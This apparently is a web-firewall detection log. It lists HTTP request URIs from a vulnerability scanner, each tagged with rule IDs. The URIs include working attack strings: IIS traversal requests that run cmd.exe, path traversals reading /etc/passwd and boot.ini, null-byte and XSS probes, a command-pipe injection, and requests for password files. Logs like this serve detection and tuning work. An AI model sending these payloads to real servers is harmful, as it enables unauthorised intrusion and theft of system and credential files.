Packet [1846]	Uri [/database/db2SensePostNotThereNoNo.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1847]	Uri [/database/db2000.mdb]	Nattacks [1 ]	Signatures	[920440]
Packet [1848]	Uri [/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1849]	Uri [/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1852]	Uri [/exchange/lib/AMPROPS.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1853]	Uri [/exchange/lib/ATTACH.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1854]	Uri [/exchange/lib/DELETE.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1855]	Uri [/exchange/lib/DELETE.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1856]	Uri [/exchange/lib/GETREND.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1857]	Uri [/exchange/lib/GETWHEN.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1858]	Uri [/exchange/lib/JSATTACH.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1859]	Uri [/exchange/lib/JSROOT.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1860]	Uri [/exchange/lib/JSUTIL.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1861]	Uri [/exchange/lib/LANG.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1862]	Uri [/exchange/lib/logon.inc]	Nattacks [1 ]	Signatures	[920440]
Packet [1863]	Uri [/exchange/lib/PAGEUTIL.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1864]	Uri [/exchange/lib/PUBFLD.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1865]	Uri [/exchange/lib/RENDER.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1866]	Uri [/exchange/lib/SESSION.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1867]	Uri [/exchange/lib/SESSION.INC]	Nattacks [1 ]	Signatures	[920440]
Packet [1869]	Uri [/global.asa]	Nattacks [1 ]	Signatures	[920440]
Packet [1870]	Uri [/global.asa]	Nattacks [1 ]	Signatures	[920440]
Packet [1874]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1875]	Uri [/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1876]	Uri [/iisadmpwd/aexSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1877]	Uri [/iisadmpwd/aexp2.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1878]	Uri [/iisadmpwd/aexp2b.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1879]	Uri [/iisadmpwd/aexp3.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1880]	Uri [/iisadmpwd/aexp4.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1881]	Uri [/iisadmpwd/aexp4b.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [1891]	Uri [/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1894]	Uri [/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1896]	Uri [/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1898]	Uri [/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1899]	Uri [/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1900]	Uri [/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1907]	Uri [/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1908]	Uri [/iissamples/sdk/asp/docs/CodSensePostNotThereNoNo.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1909]	Uri [/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1912]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1913]	Uri [/iissamples/sdk/asp/docs/WinSensePostNotThereNoNo.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1914]	Uri [/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [1919]	Uri [/isapi/tstisapi.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1928]	Uri [/YGFPU.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [1929]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1930]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1931]	Uri [/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1932]	Uri [/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1933]	Uri [/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1934]	Uri [/msadc/msaSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1935]	Uri [/msadc/msadcs.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1936]	Uri [/msadc/msadcs.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1939]	Uri [/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [1940]	Uri [/nikto.ida]	Nattacks [1 ]	Signatures	[920440]
Packet [1941]	Uri [/nikto.ida]	Nattacks [1 ]	Signatures	[920440]
Packet [1948]	Uri [/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [1949]	Uri [/NULL.printer]	Nattacks [1 ]	Signatures	[920440]
Packet [1955]	Uri [/OpenFile.aspx?file=../../../../../../../../../../boot.ini]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [1956]	Uri [/pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1957]	Uri [/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1958]	Uri [/pbserver/pbsSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1959]	Uri [/pbserver/pbserver.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1962]	Uri [/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1963]	Uri [/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [1967]	Uri [/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1968]	Uri [/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1969]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1970]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1971]	Uri [/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [1972]	Uri [/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920272]	[930100]	[930110]
Packet [1973]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [1974]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [1975]	Uri [/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\]	Nattacks [3 ]	Signatures	[920271]	[920272]	[930100]
Packet [1978]	Uri [/scripts/Carello/CarSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1979]	Uri [/scripts/Carello/Carello.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1986]	Uri [/scripts/cpsSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1987]	Uri [/scripts/cpshost.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1997]	Uri [/scripts/httSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1998]	Uri [/scripts/httpodbc.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [1999]	Uri [/scripts/iisadmin/bdiSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2000]	Uri [/scripts/iisadmin/bdir.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2001]	Uri [/scripts/iisadmin/ismSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2002]	Uri [/scripts/iisadmin/ism.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2004]	Uri [/scripts/proxy/w3pSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2005]	Uri [/scripts/proxy/w3proxy.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [2008]	Uri [/scripts/samples/detSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2009]	Uri [/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2010]	Uri [/scripts/samples/search/author.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2011]	Uri [/scripts/samples/search/filesize.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2012]	Uri [/scripts/samples/search/filetime.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2013]	Uri [/scripts/samples/search/qfullhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [2014]	Uri [/scripts/samples/search/qsumrhit.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [2015]	Uri [/scripts/samples/search/queryhit.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2016]	Uri [/scripts/samples/search/simple.idq]	Nattacks [1 ]	Signatures	[920440]
Packet [2017]	Uri [/scripts/tools/ctsSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2018]	Uri [/scripts/tools/ctss.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [2031]	Uri [/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2087]	Uri [/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2088]	Uri [/trace.axd]	Nattacks [1 ]	Signatures	[920440]
Packet [2097]	Uri [//WebSensePostNotThereNoNo.dll?View=Logon]	Nattacks [1 ]	Signatures	[920440]
Packet [2098]	Uri [/WebAdmin.dll?View=Logon]	Nattacks [1 ]	Signatures	[920440]
Packet [2099]	Uri [/whatever.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2100]	Uri [/whatever.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2101]	Uri [//whaSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2102]	Uri [//whaSensePostNotThereNoNo.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2103]	Uri [/whatever.htr]	Nattacks [1 ]	Signatures	[920440]
Packet [2104]	Uri [//WS_SensePostNotThereNoNo.LOG]	Nattacks [1 ]	Signatures	[920440]
Packet [2105]	Uri [//WS_SensePostNotThereNoNo.LOG]	Nattacks [1 ]	Signatures	[920440]
Packet [2106]	Uri [/WS_FTP.LOG]	Nattacks [1 ]	Signatures	[920440]
Packet [2107]	Uri [/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [2125]	Uri [/.nsf/../winnt/winSensePostNotThereNoNo.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [2126]	Uri [/.nsf/../winnt/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2496]	Uri [/LOGIN.PWD]	Nattacks [1 ]	Signatures	[920440]
Packet [2504]	Uri [/_vti_pvt/administrators.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [2505]	Uri [/_vti_pvt/authors.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [2506]	Uri [/_vti_pvt/users.pwd]	Nattacks [1 ]	Signatures	[920440]
Packet [2510]	Uri [/.nsconfig]	Nattacks [1 ]	Signatures	[930130]
Packet [2526]	Uri [/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [2530]	Uri [/search?NS-query-pat=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2531]	Uri [/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [2551]	Uri [/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2554]	Uri [/nsn/..%5Cutil/attSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2555]	Uri [/nsn/..%5Cutil/attrib.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2556]	Uri [/nsn/..%5Cutil/chkSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2557]	Uri [/nsn/..%5Cutil/chkvol.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2558]	Uri [/nsn/..%5Cutil/copSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2559]	Uri [/nsn/..%5Cutil/copy.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2560]	Uri [/nsn/..%5Cutil/delSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2561]	Uri [/nsn/..%5Cutil/delSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2562]	Uri [/nsn/..%5Cutil/del.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2563]	Uri [/nsn/..%5Cutil/dirSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2564]	Uri [/nsn/..%5Cutil/dir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2565]	Uri [/nsn/..%5Cutil/dsbSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2566]	Uri [/nsn/..%5Cutil/dsbrowse.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2567]	Uri [/nsn/..%5Cutil/gliSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2568]	Uri [/nsn/..%5Cutil/glist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2569]	Uri [/nsn/..%5Cutil/lanSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2570]	Uri [/nsn/..%5Cutil/lancard.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2571]	Uri [/nsn/..%5Cutil/md.SensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2572]	Uri [/nsn/..%5Cutil/md.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2573]	Uri [/nsn/..%5Cutil/md.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2574]	Uri [/nsn/..%5Cutil/rd.SensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2575]	Uri [/nsn/..%5Cutil/rd.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2576]	Uri [/nsn/..%5Cutil/renSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2577]	Uri [/nsn/..%5Cutil/ren.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2578]	Uri [/nsn/..%5Cutil/senSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2579]	Uri [/nsn/..%5Cutil/send.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2580]	Uri [/nsn/..%5Cutil/setSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2581]	Uri [/nsn/..%5Cutil/set.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2582]	Uri [/nsn/..%5Cutil/sliSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2583]	Uri [/nsn/..%5Cutil/slist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2584]	Uri [/nsn/..%5Cutil/typSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2585]	Uri [/nsn/..%5Cutil/type.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2586]	Uri [/nsn/..%5Cutil/useSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2587]	Uri [/nsn/..%5Cutil/userlist.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2588]	Uri [/nsn/..%5Cweb/envSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2589]	Uri [/nsn/..%5Cweb/env.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2590]	Uri [/nsn/..%5Cweb/fdiSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2591]	Uri [/nsn/..%5Cweb/fdir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2592]	Uri [/nsn/..%5Cwebdemo/envSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2593]	Uri [/nsn/..%5Cwebdemo/env.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2594]	Uri [/nsn/..%5Cwebdemo/fdiSensePostNotThereNoNo.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2595]	Uri [/nsn/..%5Cwebdemo/fdir.bas]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2639]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [2640]	Uri [/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [2649]	Uri [/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942511]
Packet [2651]	Uri [/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x]	Nattacks [8 ]	Signatures	[941100]	[941110]	[941160]	[941320]	[942130]	[942370]	[942431]	[942511]
Packet [2654]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2656]	Uri [/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [2667]	Uri [/ht_root/wwwroot/-/local/httpd$map.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2670]	Uri [/local/httpd$map.conf]	Nattacks [1 ]	Signatures	[920440]
Packet [2675]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2676]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2677]	Uri [/%00/]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2688]	Uri [/index.jsp%00x]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2689]	Uri [/index.jsp%00x]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [2691]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [2692]	Uri [/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [2693]	Uri [/%a%s%p%d]	Nattacks [2 ]	Signatures	[920220]	[920272]
Packet [2699]	Uri [/.psql_history]	Nattacks [1 ]	Signatures	[930130]
Packet [2704]	Uri [//accSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2705]	Uri [/access.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2838]	Uri [/ccbill/secure/ccbSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2839]	Uri [/ccbill/secure/ccbill.log]	Nattacks [1 ]	Signatures	[920440]
Packet [2907]	Uri [//danSensePostNotThereNoNo.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [2908]	Uri [/dan_o.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [3035]	Uri [/HyperStat/staSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3036]	Uri [/HyperStat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3037]	Uri [/hyperstat/staSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3038]	Uri [/hyperstat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3039]	Uri [/hyperstat/stat_what.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3202]	Uri [/orders/mouSensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3203]	Uri [/orders/mountain.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3204]	Uri [/orders/ordSensePostNotThereNoNo.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3205]	Uri [/orders/orders.log]	Nattacks [1 ]	Signatures	[920440]
Packet [3350]	Uri [//ss.SensePostNotThereNoNo.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3351]	Uri [/ss.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [3548]	Uri [//carSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3549]	Uri [/carbo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3584]	Uri [/scripts/cphSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3585]	Uri [/scripts/cphSensePostNotThereNoNo.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3586]	Uri [/scripts/cphost.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [3593]	Uri [/scripts/samples/ctgSensePostNotThereNoNo.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [3594]	Uri [/scripts/samples/ctguestb.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [3621]	Uri [/cgi-dos/args.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [3712]	Uri [/boilerplate.asp?NFuse_Template=../../boot.ini&amp;NFuse_CurrentFolder=/SSLx0020Directories|-|0|404_Object_Not_Found]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [3811]	Uri [//emuSensePostNotThereNoNo.cgi?type=.%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [3812]	Uri [/emumail.cgi?type=.%00]	Nattacks [3 ]	Signatures	[920270]	[920271]	[920272]
Packet [3846]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3847]	Uri [/forum-ra.asp?n=../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [3848]	Uri [/forum-ra.asp?n=/../../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [3849]	Uri [/forum-ra.asp?n=/.\./.\./.\./.\./.\./boot.ini]	Nattacks [4 ]	Signatures	[930110]	[930110]	[930120]	[942460]
